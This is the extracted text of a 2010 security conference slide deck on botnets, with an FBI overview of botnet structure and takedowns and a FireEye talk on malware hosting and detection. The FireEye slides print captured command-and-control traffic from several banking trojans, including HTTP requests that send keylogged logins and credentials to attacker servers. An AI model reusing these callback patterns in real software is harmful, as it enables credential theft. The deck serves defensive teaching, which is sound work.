Upload
nico7916886
View
224
Download
0
Embed Size (px)
Citation preview
8/6/2019 MASTER_October.web Conference PPT
1/44
Botnets
ISSA Web ConferenceOctober 26, 2010
Start Time: 9 am US Pacific, Noon US Eastern, 5 pm London
1
Sponsored by:
8/6/2019 MASTER_October.web Conference PPT
2/44
Welcome: Conference Moderator
2
Phillip H Griffin
Member - ISSA Educational Advisory Council, Web Conferences
Committee
8/6/2019 MASTER_October.web Conference PPT
3/44
Agenda
How Botnets Have Evolved
Chris Calderon - Special Agent, FBI
Rooting Out the Bad Actors Alex Lanstein - Systems Consulting Engineer, FireEye
Joint Speaker Question & Answer
Closing Comments
3
8/6/2019 MASTER_October.web Conference PPT
4/44
How Botnets HaveEvolved
presented by
Special Agent Chris Calderon
FBI
UNCLASSIFIED
UNCLASSIFIED
8/6/2019 MASTER_October.web Conference PPT
5/44
Agenda
What is a botnet?
How are botnets created?
Why are botnets created?
Basic structure of a botnet
Taking down a botnet
How botnets are evolving
Botnets in the news
Questions
UNCLASSIFIED
UNCLASSIFIED
8/6/2019 MASTER_October.web Conference PPT
6/44
What is a botnet?
A network of compromised computers
(robots/bots)
Controlled by a bot master / herder
Used to carry out various illegal activities
Services are often sold to other criminal
elements
UNCLASSIFIED
UNCLASSIFIED
8/6/2019 MASTER_October.web Conference PPT
7/44
How are botnets created?
Setup
Obtain reliable infrastructure
Develop malware and C&C software
Victims
Malware loaded onto victim machines
Done through exploits and/or social engineering
Manage Continually update software / instructions to bots Maintain statistics for the botnet
UNCLASSIFIED
UNCLASSIFIED
8/6/2019 MASTER_October.web Conference PPT
8/44
Why are botnets created?
Spam
Distributed Denial of Service (DDoS)
Click Fraud Fake Anti-Virus
Credential Theft
Proxy Service Cyber Warfare
UNCLASSIFIED
UNCLASSIFIED
8/6/2019 MASTER_October.web Conference PPT
9/44
Basic Structure
Bot Master /Herder
C&C
Server
Victim
Victim
C&C
ServerVictim
UNCLASSIFIED
UNCLASSIFIED
8/6/2019 MASTER_October.web Conference PPT
10/44
Taking down a botnet
Bot Master /Herder
C&C
Server
Victim
Victim
C&C
ServerVictim
UNCLASSIFIED
UNCLASSIFIED
8/6/2019 MASTER_October.web Conference PPT
11/44
Botnets evolving
Bot Master /Herder
C&C
Server
Proxy Victim
Proxy
Victim
Victim
C&C
ServerProxy Victim
UNCLASSIFIED
UNCLASSIFIED
8/6/2019 MASTER_October.web Conference PPT
12/44
Botnets evolving
Bot Master /Herder
ProxyC&C
Server
Proxy Victim
Proxy
Victim
Victim
ProxyC&C
ServerProxy Victim
UNCLASSIFIED
UNCLASSIFIED
8/6/2019 MASTER_October.web Conference PPT
13/44
Botnets in the news
ZEUS
Steels and logs online banking credentials
Primarily targets high balance accounts
Money mules used to get money to bad
actors
Kit now used by many different groups
Estimated $70,000,000 stolen from US banks
UNCLASSIFIED
UNCLASSIFIED
8/6/2019 MASTER_October.web Conference PPT
14/44
Botnets in the news
MARIPOSA (BUTTERFLY)
Steels online credentials, and also used in
DDoS attacks
Estimated 12 million infected computers
Bad actors traced to Spain and arrested
Criminal proceedings ongoing
UNCLASSIFIED
UNCLASSIFIED
8/6/2019 MASTER_October.web Conference PPT
15/44
Botnets in the news
SPAM BOTS
Conficker, Cutwail, Waledac, .
Up to 10 million bots per botnet
Each botnet can send billions of spam emails
per day
Spam used to distribute malware, drive
online pharmaceutical sales, fake antivirussoftware, pay per click advertising, .
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
8/6/2019 MASTER_October.web Conference PPT
16/44
Questions?
UNCLASSIFIED
UNCLASSIFIED
8/6/2019 MASTER_October.web Conference PPT
17/44
Rooting out the Bad Actorsor: p2p, fast flux, and other botnet myths
Alex LansteinSenior Security Researcher
FireEye, Inc.
8/6/2019 MASTER_October.web Conference PPT
18/44
Todays Agenda
Understanding the shift fromconventional to modern malware, andthe resultant hosting needs
A few TT&P to uncover older ormoderately sophisticated malware
A detailed looked a few bots in thenews
18
2
8/6/2019 MASTER_October.web Conference PPT
19/44
Conventional vs. Modern, APT Malware
Conventional Malware
Characterized by using spreading techniques, customC&C transport protocols, IRC communication
Examples: Malware/worms such as Conficker, Blaster,Slammer, Mega-D, IRC bots
Detectable through a variety of technologies/tactics:
NetWitness/Solera, EnVision/Arcsight/Splunk, NIDS
Port scanning, high windows port activity, non-http overport 80, non-web traffic, etc.
19
3
8/6/2019 MASTER_October.web Conference PPT
20/44
Conventional vs. Modern Malware
Modern-ish malware: Characterized by infecting via browser based exploits
Exploit Channel: PDF, Flash, IE/FireFox, QuickTime, C&C
Callback over HTTP(s) Malware: ZeuS, Gozi, Koobface, Rustock, Spyeye
Partially detectable through manual traffic analysis fairlyeasily, but a full time resource is needed
20
4
8/6/2019 MASTER_October.web Conference PPT
21/44
Worlds Top Malware
Source: FireEye Malware Intelligence Lab
21
21
8/6/2019 MASTER_October.web Conference PPT
22/44
Modern Malware Infection Lifecycle
22
Desktop antivirusLosing the threat arms race
CompromisedWeb server, orWeb 2.0 site
Callback Server
Perimeter Security
Signature, rule-based
Other gatewayList-based, signatures
System gets exploited
Drive-by attacks in casual browsing
Links in Targeted Emails
Socially engineered binaries
Dropper malware installs
First step to establish control
Calls back out to criminal servers
Found on compromised sites, andWeb 2.0, user-created content sites
Malicious data theft & long-term control established
Uploads data stolen via keyloggers,
Trojans, bots, & file grabbersOne exploit leads to dozens of
infections on same system
Criminals have built long-termcontrol mechanisms into system
3
2
1
22
8/6/2019 MASTER_October.web Conference PPT
23/44
Where is all this malware being hosted?
Previously we used to see malware being hosted oninfected home machines
Web filters responded by blocking access to domains
that had multiple A records in residential IP space
Now its being hosted on dedicated servers in proper
data centers. Sometimes even with their own RIRregistered IP space!
23
8/6/2019 MASTER_October.web Conference PPT
24/44
Root of the Problem
There is no Internet Police!
Who controls the Internet? ICANN? IANA? CERTs?USCYBERCOM? Tier 1 ISPs?
Depends who you ask and how big a stink you make.
24
8/6/2019 MASTER_October.web Conference PPT
25/44
How the Internet is delegated
In the name space (think DNS):
ICANN Registries
Registries == Verisign, Affilias, ccTLD operators Registries sell to certified gTLD and regional registrars
Registrars == namecheap.com, godaddy.com,netsol.com
Registrars sell to registrants (end user)
25
8/6/2019 MASTER_October.web Conference PPT
26/44
How the Internet is delegated
In the IP space:
ICANN/IANA (Internet Assigned Numbers Authority)
IANA
RIRs RIRs == ARIN, LACNIC, AFRINIC, APNIC, RIPE-NCC
RIRs LIRs
LIRs are generally data centers and ISPs
26
8/6/2019 MASTER_October.web Conference PPT
27/44
27
8/6/2019 MASTER_October.web Conference PPT
28/44
28
8/6/2019 MASTER_October.web Conference PPT
29/44
29
8/6/2019 MASTER_October.web Conference PPT
30/44
ICANNt do anything!
ICANN and the RIRs simply sign contracts. They haveno regulatory authority whatsoever, presuming that theRegistrar doesnt violate the contract. These contractshave no mention of content.
Recent success against EstDomains was due to themhaving a convicted felon as an Officer of the company.
Large pushback when someone even suspects theyare trying to take an authoritative stance on something.
30
8/6/2019 MASTER_October.web Conference PPT
31/44
31
8/6/2019 MASTER_October.web Conference PPT
32/44
32
8/6/2019 MASTER_October.web Conference PPT
33/44
Big bots in 2010
8/6/2019 MASTER_October.web Conference PPT
34/44
Rustock still sticking around
POST /index.php?topic=33.117 HTTP/1.1
Accept: */*Accept-Language: en-usReferer: http://go-thailand-now.com/Content-Type: application/x-www-form-urlencodedContent-Encoding: gzip
UA-CPU: x86Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0;Windows NT 5.1)Host: go-thailand-now.com
Content-Length: 214Connection: Keep-AliveCache-Control: no-cache
18
34
8/6/2019 MASTER_October.web Conference PPT
35/44
Gozi
35
19
POST /cgi-bin/forms.cgi HTTP/1.0Content-Type: multipart/form-data; boundary=--------------------------139b9b3139b9b3139b9b3User-Agent: IEHost: 91.216.215.130Content-Length: 453
Pragma: no-cache
----------------------------139b9b3139b9b3139b9b3Content-Disposition: form-data; name="upload_file"; filename="3759777034.21"Content-Type: application/octet-stream
URL: https://mail.google.com/mail/channel/bind?VER=8&at=KLJASDF133234901FhI &it=1121&SID=6JK1290NR3A3&RID=4611&AID=95&= mousemove----------------------------139b9b3139b9b3139b9b3--
8/6/2019 MASTER_October.web Conference PPT
36/44
Zeus
POST /xed/gate.php HTTP/1.1
Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1;
WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; HPNTDF)
Host: schastlivieiveselierebyta0001.com
Content-Length: 329Connection: Keep-Alive
Cache-Control: no-cache
. ....4...A..2.`.Ul...T.......(....4pP.u.x.!.D.!.+.......q..'7.........7.....D.0..Y...$.......[(...F...c.|e.y...g.b..t.x.......-
[email protected]>.s..j=.
..rY?.-8.c Ss.Gt'.a. ...cU./. .e(....QB.D.S..N0>.5.....I. :........".....;5..U.
.t....!......f.=E.
8/6/2019 MASTER_October.web Conference PPT
37/44
Tigger Not just financials anymore
POST /track_c.cgi HTTP/1.0Content-Length: 81icin.wembh.rjr...{|.JST]....wSJAUQFN.mST^AJS.bj.i_HUUY_.j[YQ. .J.J.. ...L .
SANDBOX_QEZA1290412412;append;20;Microsoft Windows XP Service Pack
3;post_log;16639;force;[[[URL: https://internal.fireeye.com/login
Title: Process: C:\Program Files\Internet Explorer\iexplore.exeUser-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts;.NET CLR 3.0.04506.30; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR3.0.04506.648; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)]]]{{{_b=sandbox&_k=mypass55%23&_r=0&timezone=420&timezoneFeb=420&timezoneOct=420&clientTime=removed&awr=1&isLoginForm=1&awsnf=_5&awsn=_u&awfid=true&awcharset=UTF-8&KEYLOG=s}}}21
37
https://internal.fireeye.com/loginhttps://internal.fireeye.com/login8/6/2019 MASTER_October.web Conference PPT
38/44
SpyEye ZeuS replacement?
GET /web/map/gate.php?guid=users1!AJKLPQ!JU1232&ver=10280&stat=ONLINE&plg=ftpbc;socks5;t2p&cpu=0&ccrc=JKLAF24&md5=9012ab902413dcf8gga89 HTTP/1.0User-Agent: Microsoft Internet ExplorerHost: hahsdhsl.comPragma: no-cache
GET /maincp/gate.php?guid=user2!ND93103!893CND1&ver=10280&stat=ONLINE&cpu=0&ccrc=A91024N&md5=3fabd889712214bdbee8381337 HTTP/1.0User-Agent: Microsoft Internet ExplorerHost: www.promohru.inPragma: no-cache
22
38
8/6/2019 MASTER_October.web Conference PPT
39/44
Carberp Yet Another Datastealer
POST /recv.php HTTP/1.1
Host: 194.54.80.146User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10Accept: text/htmlConnection: CloseContent-Type: application/x-www-form-urlencodedContent-Length: 331
uid=MYWITCH099ABE891209141FGA91AFD&brw=2&type=1&data=https%3A%2F%2Fwww%2Estarwoodhotels%2Ecom%2Fpreferredguest%2Faccount%2Fsign%5Fin%2Ehtml%3F%7
CPOST%3AsuccessPath%3Dhttps%253A%252F%252Fwww%2Estarwoodhotels%2Ecom%252Fpreferredguest%252Findex%2Ehtml%26login%3DALEXLANSTEIN%2540GMAIL%2ECOM%26persist%3Dtrue%26password%3Dmypassword
23
39
8/6/2019 MASTER_October.web Conference PPT
40/44
TDSS Full on SSL
19:11:56.590979 IP 194.28.113.21.443 > 192.168.2.44.54528:tcp 620....E [email protected][z7l.:........................J...F..L...N.]...xmvF..(..l...?},,nc{..ygs.R...._........8.a#9cU....I..5................0...0..j. ...yV.9.x0 . *.H.......0E1.0 ..U....AU1.0...USome-State1!0...U...Internet WidgitsPty Ltd0.. 100114192303Z. 110114192303Z0E1.0.U....AU1.0...USome-State1!0...U...Internet Widgits Pty Ltd0..0. *.H.. .........0.......|[email protected]
....]P.*.....W.C...N5.(...Ux.z.._....W...b....*.P....AX.....(.......E.....0 .*.H.. [email protected].$K)..EF;....u.X......r.l.\......[.r.0@......%....S`...p....
.=3;[email protected]^7......"Zw..5.)g..........
24
40
8/6/2019 MASTER_October.web Conference PPT
41/44
41
FireEye, Inc. Confidential 41
www.fireeye.comFor late-breaking malware research and news:
blog.fireeye.com
Thank you!
Alex [email protected]
http://www.fireeye.com/mailto:[email protected]:[email protected]://www.fireeye.com/8/6/2019 MASTER_October.web Conference PPT
42/44
Joint Speaker Question & Answer
Chris Calderon Special Agent, FBI
Alex Lanstein
Systems Consulting Engineer, FireEye
42
8/6/2019 MASTER_October.web Conference PPT
43/44
43
Closing Remarks
Online Meetings Made Easy
Thank you to Citrix for donating this Webcast service
Thank you to FireEye for their support of ISSA and this Web Conference
8/6/2019 MASTER_October.web Conference PPT
44/44
CPE Credit
Within 24 hours of the conclusion of this webcast,you will receive a link to a post Web Conferencequiz.
After the successful completion of the quiz you willbe given an opportunity to PRINT a certificate ofattendance to use for the submission of CPEcredits.
44